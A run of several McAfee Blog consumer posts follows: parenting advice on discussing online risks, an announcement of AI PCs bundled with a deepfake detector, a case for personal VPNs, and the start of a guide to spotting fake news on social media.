Talking to your kids about sex, pornography, and cyberbullying can be really stressful. But there is so much research that shows that proactive conversations about tricky topics such as sex can be really beneficial. A review of research on British parents’ involvement in sex education found that they often felt embarrassed about broaching the subject with their kids. The same review compared this to countries such as Sweden where parents talked openly to their children about sex from an early age. It attributed the difference in approaches to the higher rates of teenage pregnancy and sexually transmitted diseases in England and Wales. Fascinating!

How To Talk About The Tricky Stuff

• Start As Early As You Can

Start by teaching them the correct names for body parts. When they start preschool or school, you can teach them about respecting others and also about how to express their feelings. This will set them up for open and honest conversations and relationships.

• Acknowledge The Awkwardness

Own the fact that it may feel really embarrassing or awkward when chatting to your kids about these topics. Perhaps make a joke of it. But assure them you’re going to do your best to help them navigate these issues and that you can absolutely handle it.

• It’s Not ‘One and Done’

Why not break it up into small regular chats and take the pressure off? One big talk is overwhelming and could feel really awkward and pressured. A little bit of chatter often will feel more natural. Why not use films, books, or movies as a trigger for a conversation? The more natural and less contrived it feels, the more relaxed and receptive everyone will be.

• Don’t Be Judgemental

Expressing disapproval or shock when your kids are sharing something tricky with you is the fastest way to shut down communication. So stop yourself! And if they do share something that surprises you, make sure you thank them and suggest you both talk about it more so you can better understand.

Now, if you have tweens or teens and you regret not prioritising your family’s communication culture earlier, do not stress. It’s never too late to make a difference! Yes, there might be a whole lot of awkwardness, but it will absolutely pass. Share stories of your online life, and news stories that you will start a conversation, ask them questions about their online life, and most importantly, be calm and don’t be critical or negative when they start sharing. Otherwise, it will be over ASAP.

You can absolutely handle this!

The post Top Strategies For Keeping Your Kids Safe Online appeared first on McAfee Blog.

In today’s digital world, both personal and professional environments are evolving faster than ever. As artificial intelligence (AI) becomes integral to our daily lives, it’s crucial that the devices we use stay ahead of the curve—both in terms of performance and security. According to Gartner, AI PCs are projected to total 114 million units in 2025, an increase of 165.5% from 2024. That’s why we’re excited to introduce the next generation of AI-powered PCs with our partners, designed to provide cutting-edge computing experiences with next-level AI-protection with McAfee Deepfake Detector.

Unparalleled AI Performance

These AI PCs have been built with one goal in mind: to harness the power of AI for every user. Whether you’re a content creator, business professional, gamer, or researcher, AI PCs adapt to your needs, offering enhanced processing speed, personalized optimization, and smart task management. From boosting productivity to delivering immersive entertainment, AI PCs are designed to handle it all.

AI Protection That Keeps You Safe

We understand that in an age where digital content is omnipresent, online security must be a top priority. That’s why the following AI PCs come with McAfee Deepfake Detector preinstalled. This advanced tool is designed to protect you against the growing threat of AI-manipulated media, ensuring that you can trust the content you see online. McAfee’s Deepfake Detector uses cutting-edge algorithms to analyze AI-generated audio, distinguishing between real and manipulated content.

McAfee’s recent research shows that 27% of Americans say they may or will purchase an AI PC for themselves or a loved one during the 2024 holiday season. 40% of people aged 25-34 say the same. When asked what characteristics of an AI PC are most important to consumers:

• 25% of Americans said AI-powered security and/or deepfake detection.
• 29% said faster processing.
• 17% said better personalization.
• 25% said improved productivity.
• 22% said better battery life.
• 47% weren’t sure / didn’t know much about the capabilities of an AI PC

As deepfakes become more sophisticated, this feature provides peace of mind, ensuring that you’re always one step ahead of malicious actors.

Innovation Meets Trust

Our new AI PC range combines world-class performance with trusted security solutions. Whether you’re using these devices for work, play, or creativity, you’ll have the confidence of knowing your personal data and online experiences are safeguarded by the latest in AI-driven protection. McAfee Deepfake Detector is available on the following AI PC:

• Lenovo: Yoga Slim 7X Snapdragon Elite, Yoga Slim 7i Aura Edition, IdeaPad 5x, ThinkPad T14S 
• Dell: XPS 13/16, Latitude 5450/5550/7450/7455/7650, Inspiron 14 Plus 
• Acer: Swift AI 14 and 16 AI 
• HP: OmniBook Ultra Flip 16​, Omnibook X Laptop/AIO
• ASUS: Commercial: ASUS ExpertBook P5 
• ASUS: Consumer: Zenbook S14 & S16 
• Samsung: Galaxy Book 4 Edge, Galaxy Book 5 Pro 360 

Stay tuned for more details about this exciting new range, and discover how we’re redefining the future of online protection

The post Introducing AI PCs with McAfee Deepfake Detector appeared first on McAfee Blog.

It used to be the case that only businesses used virtual private networks (VPNs) to connect securely to the internet and keep their private data safe. But these days, with the rapid growth of online threats and privacy concerns, even casual internet users should seriously consider using a VPN. Nearly 30% of people now use VPNs for personal reasons, and that number is only growing as more people learn about how VPNs offer an effective way to safeguard online privacy, enhance security, and protect against various cyber threats.

If you are not familiar with this technology, a VPN essentially allows you to send and receive data across a public network as if it were a private network that encrypts, or scrambles, your information so others cannot read it. Let’s take a look at the top 3 reasons why a VPN could come in handy for you.

1. You work remotely—If you like to take your laptop or mobile device to the library or cafe, you probably connect through public Wi-Fi. The problem is that many free, public Wi-Fi networks are not secured. This means that a hacker could easily intercept the information you send over the public network, including your passwords and banking information. A personal VPN means you can connect securely any time you are away from home.
2. You want full access to the internet when traveling— When traveling, cybersecurity risks abound, from unsecured public Wi-Fi networks to potential data breaches. Using a VPN while traveling can mitigate these risks by encrypting your internet connection and protecting your sensitive information from hackers and other malicious actors.
3. You take your privacy seriously— Internet service providers (ISPs) often track and store information about what we do online, as do the websites we visit. This is how they serve up targeted ads and make money when we click on them. (They track us by identifying the unique number assigned to your device, called an Internet Protocol address.) However, when you use a VPN, your traffic is routed through different Internet Protocol addresses, making you anonymous.

What to look for in a VPN:

Now that you know why having a personal VPN is so useful, here are a few tips to help you choose the right product for you:

• Ease of use—You want secure technology, without having to be a tech whiz to use it. That’s why you should look for a product that is easy to implement, like the McAfee Safe Connect VPN app, which allows you to easily and securely connect, ensuring that your passwords and data stay private when using public networks.
• Robust security—Look for a VPN with bank-grade encryption. This way no one can read or access the private information you send over the network.
• Access to virtual locations—With this feature, you can gain full access to the Internet and browse anonymously.

The post Why You Need a Personal VPN appeared first on McAfee Blog.

Spotting fake news in your feed has always been tough. Now it just got tougher, thanks to AI. 

Fake news crops up in plenty of places on social media. And it has for some time now. In years past, it took the form of misleading posts, image captions, quotes, and the sharing of outright false information in graphs and charts. Now with the advent of AI, we see fake news taken to new levels of deception:  

• Deepfake videos that mimic the looks and parrot the words of well-known public figures.  
• AI-generated voice clones that sound spooky close to the voices they mimic.  
• Also, entire news websites generated by AI, rife with bogus stories and imagery.  

All of it’s out there. And knowing how to separate truth from fact has never been of more importance, particularly as more and more people get their news via social media.  

Pew Research found that about a third of Americans say they regularly get their news from Facebook and nearly 1 in 4 say they regularly get it from YouTube. Moreover, global research from Reuters uncovered that more people primarily get their news from social media (30%) rather than from an established news site or app (22%). This marks the first time that social media has toppled direct access to news. 

Yet, you can spot fake news. Plenty of it.  

The process starts with a crisp definition of what fake news is, followed by the forms it takes, and then a sense of what the goals behind it are. With that, you can apply a critical eye and pick out the telltale signs.  

We’ll cover it all here. 

What is fake news? 

A textbook definition of fake news goes something like this:  

A false news story, fabricated with no verifiable facts, and presented in a way to appear as legitimate news.  

As for its intent, fake news often seeks to damage the reputation of an individual, institution, or organization. It might also spout propaganda or attempt to undermine established facts. 

That provides a broad definition. Yet, like much fake news itself, the full definition is much more nuanced. Within fake news, you’ll find two categories: disinformation and misinformation: 

• Disinformation: This is intentionally misleading information that’s been manipulated to create a flat-out lie—typically with an ulterior motive in mind. Here, the creator knows that the information is false. 

• Example: As a bad joke, a person concocts a phony news story that a much-anticipated video game release just got canceled. However, the game will certainly see its release. In the meantime, word spreads and online fans whip up into a frenzy. 

• Misinformation: This simply involves getting the facts wrong. Unknowingly so, which separates itself from disinformation. We’re only human, and sometimes that means we forget details or recall things incorrectly. Likewise, when a person shares disinformation, that’s a form of misinformation as well, if the person shares it without fact-checking.  

• Example: A person sees a post that a celebrity has died and shares that post with their friends and followers—when in fact, that celebrity is still very much alive. 

From there, fake news gets more nuanced still. Misinformation and disinformation fall within a range. Some of it might appear comical, while other types might have the potential to do actual harm.  

Dr. Claire Wardle, the co-director of the Information Futures Lab at Brown University, cites seven types of misinformation and disinformation on a scale as visualized below: 

 Source – FirstDraftNews.org and Brown University 

Put in a real-life context, you can probably conjure up plenty of examples where you’ve seen. Like clickbait-y headlines that link to letdown articles with little substance. Maybe you’ve seen a quote pasted on the image of a public figure, a quote that person never made. Perhaps an infographic, loaded with bogus statistics and attributed to an organization that doesn’t even exist. It can take all forms.  

Who’s behind fake news? And why? 

The answers here vary as well. Greatly so. Fake news can begin with a single individual, or groups of like-minded individuals with an agenda, and it can even come from operatives for various nation-states. As for why, they might want to poke fun at someone, drive ad revenue through clickbait articles, or spout propaganda.  

Once more, a visualization provides clarity in this sometimes-murky mix of fake news:   

 Source – FirstDraftNews.org and Brown University 

In the wild, some examples of fake news and the reasons behind it might look like this: 

• Imposter sites that pose as legitimate news outlets yet post entirely unfounded pieces of propaganda. 
• Parody sites that can look legitimate, so much so that people might mistake their content for actual news. 
• AI deepfakes, images, recordings, and videos of public figures in embarrassing situations, yet that get presented as “real news” to damage their reputation. 

Perhaps a few of these examples ring a bell. You might have come across somewhere you weren’t exactly sure if it was fake news or not.  

The following tools can help you know for sure. 

Spotting what’s real and fake in your social media feed. 

Consider the source 

Some of the oldest advice is the best advice, and that holds true here: consider the source. Take time to examine the information you come across. Look at its source. Does that source have a track record of honesty and dealing plainly with the facts?  

• For an infographic, you can search for the name of its author or the institution that’s attributed to it. Are they even real in the first place? 
• For news websites, check out their “About Us” pages. Many bogus sites skimp on information here, whereas legitimate sites will go to lengths about their editorial history and staff.  
• For any content that has any citation listed to legitimize it as fact, search on it. Plenty of fake news uses sources and citations that are just as fake too.